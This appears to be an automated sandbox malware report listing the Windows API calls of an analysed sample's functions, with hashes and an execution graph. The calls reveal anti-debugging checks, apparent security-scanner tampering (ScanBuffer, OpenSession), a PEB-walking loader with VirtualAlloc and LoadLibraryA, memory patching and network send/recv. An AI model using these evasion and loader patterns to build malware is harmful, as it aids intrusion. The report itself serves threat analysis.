                                                                  • GetThreadLocale.KERNEL32(?,00000000,02EBAAF7,?,?,00000000), ref: 02EBAA78
                                                                    • Part of subcall function 02EBA7D4: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 02EBA7F2
                                                                  • GetThreadLocale.KERNEL32(00000000,00000004,00000000,02EBAAF7,?,?,00000000), ref: 02EBAAA8
                                                                  • EnumCalendarInfoA.KERNEL32(Function_0000A9AC,00000000,00000000,00000004), ref: 02EBAAB3
                                                                  • GetThreadLocale.KERNEL32(00000000,00000003,00000000,02EBAAF7,?,?,00000000), ref: 02EBAAD1
                                                                  • EnumCalendarInfoA.KERNEL32(Function_0000A9E8,00000000,00000000,00000003), ref: 02EBAADC
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1427879050.0000000002EB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1427857534.0000000002EB0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1428011710.0000000002EDE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1428011710.000000000302B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1428011710.000000000302E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_2eb0000_1m181Ru74o.jbxd
                                                                  Similarity
                                                                  • API ID: Locale$InfoThread$CalendarEnum
                                                                  • String ID:
                                                                  • API String ID: 4102113445-0
                                                                  • Opcode ID: f8b680cdc45230d3d9654d08d3ed94e69122cb31ed55172288c664fe14648aef
                                                                  • Instruction ID: f193f43884fd0fbfbffb8226b3e5a069dce5dff4f941b217730e4499a5874caf
                                                                  • Opcode Fuzzy Hash: f8b680cdc45230d3d9654d08d3ed94e69122cb31ed55172288c664fe14648aef
                                                                  • Instruction Fuzzy Hash: 1101D4712C0204AAFE13A774DC12BDB735DDF86710F61E531F400E6B84E6659D008A64
                                                                  APIs
                                                                  • GetThreadLocale.KERNEL32(?,00000000,02EBACE0,?,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 02EBAB3F
                                                                    • Part of subcall function 02EBA7D4: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 02EBA7F2
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1427879050.0000000002EB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1427857534.0000000002EB0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1428011710.0000000002EDE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1428011710.000000000302B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1428011710.000000000302E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_2eb0000_1m181Ru74o.jbxd
                                                                  Similarity
                                                                  • API ID: Locale$InfoThread
                                                                  • String ID: eeee$ggg$yyyy
                                                                  • API String ID: 4232894706-1253427255
                                                                  • Opcode ID: ca3cb66f0ae78ce08bc1c0cc62cd3035e52108d0d9f4155207b54d1818588b24
                                                                  • Instruction ID: 4032d2a72d3d9fd6e71e9860ee85891b6876bd99f9d316d602ca7ee79311fb13
                                                                  • Opcode Fuzzy Hash: ca3cb66f0ae78ce08bc1c0cc62cd3035e52108d0d9f4155207b54d1818588b24
                                                                  • Instruction Fuzzy Hash: 1341CD707C41184BDE13EB6888A06FFB3EBDF82205B64E575B452C2785EA359D01CEA1
                                                                  APIs
                                                                    • Part of subcall function 02EC81DC: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02EC824C,?,?,00000000,?,02EC7A8E,ntdll,00000000,00000000,02EC7AD3,?,?,00000000), ref: 02EC821A
                                                                    • Part of subcall function 02EC81DC: GetModuleHandleA.KERNELBASE(?), ref: 02EC822E
                                                                    • Part of subcall function 02EC8284: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02EC830C,?,?,00000000,00000000,?,02EC8225,00000000,KernelBASE,00000000,00000000,02EC824C), ref: 02EC82D1
                                                                    • Part of subcall function 02EC8284: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02EC82D7
                                                                    • Part of subcall function 02EC8284: GetProcAddress.KERNEL32(?,?), ref: 02EC82E9
                                                                  • RtlMoveMemory.NTDLL(?,?,?), ref: 02EC7EE7
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1427879050.0000000002EB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1427857534.0000000002EB0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1428011710.0000000002EDE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1428011710.000000000302B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1428011710.000000000302E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_2eb0000_1m181Ru74o.jbxd
                                                                  Similarity
                                                                  • API ID: HandleModule$AddressProc$MemoryMove
                                                                  • String ID: Ntdll$RtlM$oveM
                                                                  • API String ID: 2705147948-1610840992
                                                                  • Opcode ID: 24beeab58da9ed1b9f05b2f2163cddd8a203cdd9429e6fe8e4f1362b2b0efcb2
                                                                  • Instruction ID: 45059397fc7f192e748ea9352288f72e25c1f137d010768a02c445a9127eb60a
                                                                  • Opcode Fuzzy Hash: 24beeab58da9ed1b9f05b2f2163cddd8a203cdd9429e6fe8e4f1362b2b0efcb2
                                                                  • Instruction Fuzzy Hash: 970171706C42887FFB42EBD6DE52F9AF7DDEB08B00F60A468B905D2680C67499118E64
                                                                  APIs
                                                                  • GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02EC824C,?,?,00000000,?,02EC7A8E,ntdll,00000000,00000000,02EC7AD3,?,?,00000000), ref: 02EC821A
                                                                    • Part of subcall function 02EC8284: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02EC830C,?,?,00000000,00000000,?,02EC8225,00000000,KernelBASE,00000000,00000000,02EC824C), ref: 02EC82D1
                                                                    • Part of subcall function 02EC8284: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02EC82D7
                                                                    • Part of subcall function 02EC8284: GetProcAddress.KERNEL32(?,?), ref: 02EC82E9
                                                                  • GetModuleHandleA.KERNELBASE(?), ref: 02EC822E
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1427879050.0000000002EB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1427857534.0000000002EB0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1428011710.0000000002EDE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1428011710.000000000302B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1428011710.000000000302E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_2eb0000_1m181Ru74o.jbxd
                                                                  Similarity
                                                                  • API ID: HandleModule$AddressProc
                                                                  • String ID: AeldnaHeludoMteG$KernelBASE
                                                                  • API String ID: 1883125708-1952140341
                                                                  • Opcode ID: 0dfc26345ebdd37283ca1b563484e9fd514ad79a4a4ceb5ef3c75484d496fe93
                                                                  • Instruction ID: 7152073aa30e0b0b02128d1416633e5ac72f1811ea6f67afa9a159142ef45156
                                                                  • Opcode Fuzzy Hash: 0dfc26345ebdd37283ca1b563484e9fd514ad79a4a4ceb5ef3c75484d496fe93
                                                                  • Instruction Fuzzy Hash: 46F0CDB0AC0708AFE707FBF4DE5595FB7EEEB49700761E864B80483604D630AD108A24
                                                                  APIs
                                                                  • GetModuleHandleW.KERNEL32(KernelBase,?,02ECFAEF,UacInitialize,02F37380,02EDB7BC,OpenSession,02F37380,02EDB7BC,ScanBuffer,02F37380,02EDB7BC,ScanString,02F37380,02EDB7BC,Initialize), ref: 02ECF6F2
                                                                  • GetProcAddress.KERNEL32(00000000,IsDebuggerPresent), ref: 02ECF704
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1427879050.0000000002EB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1427857534.0000000002EB0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1428011710.0000000002EDE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1428011710.000000000302B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1428011710.000000000302E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_2eb0000_1m181Ru74o.jbxd
                                                                  Similarity
                                                                  • API ID: AddressHandleModuleProc
                                                                  • String ID: IsDebuggerPresent$KernelBase
                                                                  • API String ID: 1646373207-2367923768
                                                                  • Opcode ID: 3a7eff0353c568fa84cef9d1a365df321ac6d1a0aa1d51ffb6ce46f94cb0ad74
                                                                  • Instruction ID: 7c986efa2a77ddca08e3b9e80d6eb0989550297e930efae83dcce7c95b4aeea2
                                                                  • Opcode Fuzzy Hash: 3a7eff0353c568fa84cef9d1a365df321ac6d1a0aa1d51ffb6ce46f94cb0ad74
                                                                  • Instruction Fuzzy Hash: 57D012A23E134019F90477F41DC485A034E891852D330FE36B026D55D2F676882B5011
                                                                  APIs
                                                                  • GetModuleHandleA.KERNEL32(kernel32.dll,?,02EDD10B,00000000,02EDD11E), ref: 02EBC48A
                                                                  • GetProcAddress.KERNEL32(00000000,GetDiskFreeSpaceExA), ref: 02EBC49B
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1427879050.0000000002EB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1427857534.0000000002EB0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1428011710.0000000002EDE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1428011710.000000000302B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1428011710.000000000302E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_2eb0000_1m181Ru74o.jbxd
                                                                  Similarity
                                                                  • API ID: AddressHandleModuleProc
                                                                  • String ID: GetDiskFreeSpaceExA$kernel32.dll
                                                                  • API String ID: 1646373207-3712701948
                                                                  • Opcode ID: ac33a90e4ade1ec82d8a7d1ee1cfe8846d9cfcf1aa6f51aa5ff8ab2cae345854
                                                                  • Instruction ID: aeb002c389946ceb5aa922958655df1fd40eed4fdeceb39df94a7f8016698fc2
                                                                  • Opcode Fuzzy Hash: ac33a90e4ade1ec82d8a7d1ee1cfe8846d9cfcf1aa6f51aa5ff8ab2cae345854
                                                                  • Instruction Fuzzy Hash: 78D0A7B1AC53014EFB03ABB3B5886B732C89F08308B58F82BF101C9200D7755950CF94
                                                                  APIs
                                                                  • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 02EBE2A7
                                                                  • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 02EBE2C3
                                                                  • SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 02EBE33A
                                                                  • VariantClear.OLEAUT32(?), ref: 02EBE363
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1427879050.0000000002EB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1427857534.0000000002EB0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1428011710.0000000002EDE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1428011710.000000000302B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1428011710.000000000302E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_2eb0000_1m181Ru74o.jbxd
                                                                  Similarity
                                                                  • API ID: ArraySafe$Bound$ClearIndexVariant
                                                                  • String ID:
                                                                  • API String ID: 920484758-0
                                                                  • Opcode ID: cd7e56306b14da739c94dd26db2064fb48e8dac8868798fc3541503821c87934
                                                                  • Instruction ID: e8e92cce6b3436a72240b0df0b7da8a3ae8ddee26d8df6b4c8e37bc1cbca909b
                                                                  • Opcode Fuzzy Hash: cd7e56306b14da739c94dd26db2064fb48e8dac8868798fc3541503821c87934
                                                                  • Instruction Fuzzy Hash: 71413C75A402198FCB62DB58CD90BCAB3BDAF49304F4891E5E54DE7211DA34AF808F61
                                                                  APIs
                                                                  • VirtualQuery.KERNEL32(?,?,0000001C), ref: 02EBAD69
                                                                  • GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 02EBAD8D
                                                                  • GetModuleFileNameA.KERNEL32(02EB0000,?,00000105), ref: 02EBADA8
                                                                  • LoadStringA.USER32(00000000,0000FFE9,?,00000100), ref: 02EBAE3E
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1427879050.0000000002EB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1427857534.0000000002EB0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1428011710.0000000002EDE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1428011710.000000000302B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1428011710.000000000302E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_2eb0000_1m181Ru74o.jbxd
                                                                  Similarity
                                                                  • API ID: FileModuleName$LoadQueryStringVirtual
                                                                  • String ID:
                                                                  • API String ID: 3990497365-0
                                                                  • Opcode ID: 4408af3454724dce53480d89796056a1bd1846d381a155caed3b51a2a5aeb4ca
                                                                  • Instruction ID: 07dc12d63705984c97d881cedb6f22f6f24c4e38648c3fbe0e515f6eddf9ea5e
                                                                  • Opcode Fuzzy Hash: 4408af3454724dce53480d89796056a1bd1846d381a155caed3b51a2a5aeb4ca
                                                                  • Instruction Fuzzy Hash: 3A413B74A802589BDB22DB68CC84BDBB7FDAF08344F4490E5A648E7341DB70AF848F55
                                                                  APIs
                                                                  • VirtualQuery.KERNEL32(?,?,0000001C), ref: 02EBAD69
                                                                  • GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 02EBAD8D
                                                                  • GetModuleFileNameA.KERNEL32(02EB0000,?,00000105), ref: 02EBADA8
                                                                  • LoadStringA.USER32(00000000,0000FFE9,?,00000100), ref: 02EBAE3E
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1427879050.0000000002EB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1427857534.0000000002EB0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1428011710.0000000002EDE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1428011710.000000000302B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1428011710.000000000302E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_2eb0000_1m181Ru74o.jbxd
                                                                  Similarity
                                                                  • API ID: FileModuleName$LoadQueryStringVirtual
                                                                  • String ID:
                                                                  • API String ID: 3990497365-0
                                                                  • Opcode ID: 193e64900096ab99cb58398fda793c0eb03d5c8dbc3212fe0d46a06d6ff097ac
                                                                  • Instruction ID: 344cccee8edb7c0601483cf2618bae1992f50b8b500dc88beabc23c74f409bed
                                                                  • Opcode Fuzzy Hash: 193e64900096ab99cb58398fda793c0eb03d5c8dbc3212fe0d46a06d6ff097ac
                                                                  • Instruction Fuzzy Hash: C7415B74A802589BDB22DB68CC84BDBB7FDAF08344F4490E5A648E7341DB70AF848F51
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1427879050.0000000002EB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1427857534.0000000002EB0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1428011710.0000000002EDE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1428011710.000000000302B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1428011710.000000000302E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_2eb0000_1m181Ru74o.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 2ba3e54e031d4a50cea052dbf74ac3c9da29a0225ecbdeacbf4a469864c12ab3
                                                                  • Instruction ID: 37bd6150432fc9791cbf3f250d820d69e303f9335d5c8f48ac105968e024b875
                                                                  • Opcode Fuzzy Hash: 2ba3e54e031d4a50cea052dbf74ac3c9da29a0225ecbdeacbf4a469864c12ab3
                                                                  • Instruction Fuzzy Hash: EEA1F8667906040BD71AAA7D9CA43EFB392DF85379F28D23EE11DCF381DB64C9418690
                                                                  APIs
                                                                  • GetThreadLocale.KERNEL32(00000004,?,00000000,?,00000100,00000000,02EB95EA), ref: 02EB9582
                                                                  • GetDateFormatA.KERNEL32(00000000,00000004,?,00000000,?,00000100,00000000,02EB95EA), ref: 02EB9588
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1427879050.0000000002EB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1427857534.0000000002EB0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1428011710.0000000002EDE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1428011710.000000000302B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1428011710.000000000302E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_2eb0000_1m181Ru74o.jbxd
                                                                  Similarity
                                                                  • API ID: DateFormatLocaleThread
                                                                  • String ID: yyyy
                                                                  • API String ID: 3303714858-3145165042
                                                                  • Opcode ID: 92a5a73b24a77747171a9726f2640e3cf777baa9224a335f02f5107ed2366401
                                                                  • Instruction ID: e2a06ae518ce487564e609ba95b92c17227051f1de76e9c5f8f8eef5cd295a12
                                                                  • Opcode Fuzzy Hash: 92a5a73b24a77747171a9726f2640e3cf777baa9224a335f02f5107ed2366401
                                                                  • Instruction Fuzzy Hash: 2E216271A852189FDB12DFA4C891AEF73B9EF09700F4190A5F905E7291D730AE40CF65
                                                                  APIs
                                                                    • Part of subcall function 02EC81DC: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02EC824C,?,?,00000000,?,02EC7A8E,ntdll,00000000,00000000,02EC7AD3,?,?,00000000), ref: 02EC821A
                                                                    • Part of subcall function 02EC81DC: GetModuleHandleA.KERNELBASE(?), ref: 02EC822E
                                                                    • Part of subcall function 02EC8284: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02EC830C,?,?,00000000,00000000,?,02EC8225,00000000,KernelBASE,00000000,00000000,02EC824C), ref: 02EC82D1
                                                                    • Part of subcall function 02EC8284: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02EC82D7
                                                                    • Part of subcall function 02EC8284: GetProcAddress.KERNEL32(?,?), ref: 02EC82E9
                                                                  • FlushInstructionCache.KERNEL32(?,?,?,00000000,Kernel32,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,02EC83D2), ref: 02EC83B4
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1427879050.0000000002EB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1427857534.0000000002EB0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1428011710.0000000002EDE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1428011710.000000000302B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1428011710.000000000302E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_2eb0000_1m181Ru74o.jbxd
                                                                  Similarity
                                                                  • API ID: HandleModule$AddressProc$CacheFlushInstruction
                                                                  • String ID: FlushInstructionCache$Kernel32
                                                                  • API String ID: 3811539418-184458249
                                                                  • Opcode ID: f947227734d8e7157b64c850c8b4c29c54d3aa88886898da49957580394c6324
                                                                  • Instruction ID: bd100862cb7fd2975275fdbcf973c9d4b7541cdd0bfa2d07b5783b1f232f5b9f
                                                                  • Opcode Fuzzy Hash: f947227734d8e7157b64c850c8b4c29c54d3aa88886898da49957580394c6324
                                                                  • Instruction Fuzzy Hash: 630162716C0308AFE706EFE5DE51F9BB7EEEB48B00F61A425B904D3640D670AD118A24
                                                                  APIs
                                                                  • IsBadReadPtr.KERNEL32(?,00000004), ref: 02ECAF5C
                                                                  • IsBadWritePtr.KERNEL32(?,00000004), ref: 02ECAF8C
                                                                  • IsBadReadPtr.KERNEL32(?,00000008), ref: 02ECAFAB
                                                                  • IsBadReadPtr.KERNEL32(?,00000004), ref: 02ECAFB7
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1427879050.0000000002EB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1427857534.0000000002EB0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1428011710.0000000002EDE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1428011710.000000000302B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1428011710.000000000302E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_2eb0000_1m181Ru74o.jbxd
                                                                  Similarity
                                                                  • API ID: Read$Write
                                                                  • String ID:
                                                                  • API String ID: 3448952669-0
                                                                  • Opcode ID: f542dd3da5673580082e1079a960d77ba65b17ad2deace2ea67f985a5ee5088c
                                                                  • Instruction ID: e5d3196428e14a03de701ce719f425e2d8fe2ca723e7acbe22a862b9dca446c7
                                                                  • Opcode Fuzzy Hash: f542dd3da5673580082e1079a960d77ba65b17ad2deace2ea67f985a5ee5088c
                                                                  • Instruction Fuzzy Hash: 4321A2B268061D9BDB21DFAACD80BAE77AAEF80315F20D525FD1497344D734D8128AA0

                                                                  Execution Graph

                                                                  Execution Coverage:1.5%
                                                                  Dynamic/Decrypted Code Coverage:99%
                                                                  Signature Coverage:4.6%
                                                                  Total number of Nodes:1121
                                                                  Total number of Limit Nodes:45
                                                                  execution_graph 92998 48e111f 93001 48e1146 92998->93001 93002 48e1178 93001->93002 93003 48e128e VirtualAlloc 93002->93003 93009 48e1135 93002->93009 93007 48e12be 93003->93007 93004 48e1384 GetPEB 93005 48e139a 93004->93005 93006 48e1452 GetPEB 93005->93006 93008 48e1403 LoadLibraryA 93005->93008 93006->93009 93007->93004 93007->93009 93008->93005 93008->93009 93010 424a00 93015 424a7d send 93010->93015 93016 41bd72 93017 41bd87 ctype ___scrt_get_show_window_mode 93016->93017 93029 41bf8a 93017->93029 93035 430c79 21 API calls _Yarn 93017->93035 93020 41bf9b 93023 41bf3e 93020->93023 93031 430c79 21 API calls _Yarn 93020->93031 93021 41bf37 ___scrt_get_show_window_mode 93021->93023 93036 430c79 21 API calls _Yarn 93021->93036 93025 41bfd4 ___scrt_get_show_window_mode 93025->93023 93032 4312ff 93025->93032 93027 41bf64 ___scrt_get_show_window_mode 93027->93023 93037 430c79 21 API calls _Yarn 93027->93037 93029->93023 93030 41b917 DeleteCriticalSection EnterCriticalSection LeaveCriticalSection ___scrt_get_show_window_mode 93029->93030 93030->93020 93031->93025 93038 43121e 93032->93038 93034 431307 93034->93023 93035->93021 93036->93027 93037->93029 93039 431237 93038->93039 93043 43122d 93038->93043 93039->93043 93044 430c79 21 API calls _Yarn 93039->93044 93041 431258 93041->93043 93045 4315ec CryptAcquireContextA 93041->93045 93043->93034 93044->93041 93046 431608 93045->93046 93047 43160d CryptGenRandom 93045->93047 93046->93043 93047->93046 93048 431622 CryptReleaseContext 93047->93048 93048->93046 93049 424991 93055 424a66 recv 93049->93055 93056 40163e 93057 401646 93056->93057 93060 401649 93056->93060 93058 401688 93064 43229f 93058->93064 93060->93058 93062 401676 93060->93062 93061 40167c 93063 43229f new 22 API calls 93062->93063 93063->93061 93068 4322a4 93064->93068 93066 4322d0 93066->93061 93068->93066 93071 439adb 93068->93071 93078 440480 7 API calls 2 library calls 93068->93078 93079 4329bd RaiseException Concurrency::cancel_current_task __CxxThrowException@8 93068->93079 93080 43301b RaiseException Concurrency::cancel_current_task __CxxThrowException@8 93068->93080 93076 443649 ___crtLCMapStringA 93071->93076 93072 443687 93082 43ad91 20 API calls __dosmaperr 93072->93082 93074 443672 RtlAllocateHeap 93075 443685 93074->93075 93074->93076 93075->93068 93076->93072 93076->93074 93081 440480 7 API calls 2 library calls 93076->93081 93078->93068 93081->93076 93082->93075 93083 43263c 93084 432648 ___DestructExceptionObject 93083->93084 93110 43234b 93084->93110 93086 43264f 93088 432678 93086->93088 93380 4327ae IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_get_show_window_mode 93086->93380 93094 4326b7 ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 93088->93094 93381 441763 5 API calls TranslatorGuardHandler 93088->93381 93090 432691 93092 432697 ___DestructExceptionObject 93090->93092 93382 441707 5 API calls TranslatorGuardHandler 93090->93382 93099 432717 93094->93099 93383 4408e7 35 API calls 5 library calls 93094->93383 93121 4328c9 93099->93121 93111 432354 93110->93111 93388 4329da IsProcessorFeaturePresent 93111->93388 93113 432360 93389 436cd1 10 API calls 4 library calls 93113->93389 93115 432365 93120 432369 93115->93120 93390 4415bf IsProcessorFeaturePresent SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 93115->93390 93117 432380 93117->93086 93118 432372 93118->93117 93391 436cfa 8 API calls 3 library calls 93118->93391 93120->93086 93392 434c30 93121->93392 93124 43271d 93125 4416b4 93124->93125 93394 44c239 93125->93394 93127 4416bd 93128 432726 93127->93128 93398 443d25 35 API calls 93127->93398 93130 40d3f0 93128->93130 93400 41a8da LoadLibraryA GetProcAddress 93130->93400 93132 40d40c 93407 40dd83 93132->93407 93134 40d415 93422 4020d6 93134->93422 93137 4020d6 28 API calls 93138 40d433 93137->93138 93428 419d87 93138->93428 93142 40d445 93454 401e6d 93142->93454 93144 40d44e 93145 40d461 93144->93145 93146 40d4b8 93144->93146 93710 40e609 116 API calls 93145->93710 93460 401e45 93146->93460 93149 40d4c6 93153 401e45 22 API calls 93149->93153 93150 40d473 93151 401e45 22 API calls 93150->93151 93152 40d47f 93151->93152 93711 40f98d 36 API calls __EH_prolog 93152->93711 93154 40d4e5 93153->93154 93465 4052fe 93154->93465 93157 40d4f4 93470 408209 93157->93470 93158 40d491 93712 40e5ba 77 API calls 93158->93712 93162 40d49a 93713 40dd70 70 API calls 93162->93713 93171 401fb8 11 API calls 93172 40d520 93171->93172 93173 401e45 22 API calls 93172->93173 93174 40d529 93173->93174 93487 401fa0 93174->93487 93176 40d534 93177 401e45 22 API calls 93176->93177 93178 40d54f 93177->93178 93179 401e45 22 API calls 93178->93179 93180 40d569 93179->93180 93181 40d5cf 93180->93181 93714 40822a 93180->93714 93182 401e45 22 API calls 93181->93182 93189 40d5dc 93182->93189 93184 40d594 93185 401fc2 28 API calls 93184->93185 93186 40d5a0 93185->93186 93187 401fb8 11 API calls 93186->93187 93190 40d5a9 93187->93190 93188 40d650 93192 40d660 CreateMutexA GetLastError 93188->93192 93189->93188 93191 401e45 22 API calls 93189->93191 93719 411f34 RegOpenKeyExA 93190->93719 93193 40d5f5 93191->93193 93194 40d991 93192->93194 93195 40d67f GetModuleFileNameW 93192->93195 93196 40d5fc OpenMutexA 93193->93196 93198 401fb8 11 API calls 93194->93198 93491 4192ae 93195->93491 93200 40d622 93196->93200 93201 40d60f WaitForSingleObject CloseHandle 93196->93201 93223 40d99a ___scrt_get_show_window_mode 93198->93223 93206 411f34 